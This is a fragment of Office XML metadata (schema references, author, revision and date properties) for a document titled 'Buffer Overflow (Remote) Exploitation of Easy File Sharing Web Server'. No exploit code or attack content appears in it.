    <xsd:import namespace="69df0899-9466-46d9-b4d2-6af5b183a6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c17de-3616-459e-9f81-95ee1c96b0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f0899-9466-46d9-b4d2-6af5b183a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47CC51-F01D-44C7-80FD-A924F4B6D5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c17de-3616-459e-9f81-95ee1c96b096"/>
    <ds:schemaRef ds:uri="69df0899-9466-46d9-b4d2-6af5b183a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1200D8-81A3-4182-8914-8E45E1E994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56F10-EC53-42D3-9D2D-5751FAF0351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Buffer Overflow (Remote) Exploitation of Easy File Sharing Web Server</vt:lpstr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Buffer Overflow (Remote) Exploitation of Easy File Sharing Web Server</dc:title>
  <dc:subject/>
  <dc:creator>ChamathMc</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chandrasiri D.D.C.M.  ms18908848</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-15T03:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-23T06:55:00Z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0x0101008817717F731C9843AE5274993A65D8D0</vt:lpwstr>
  </property>
</Properties>
</file>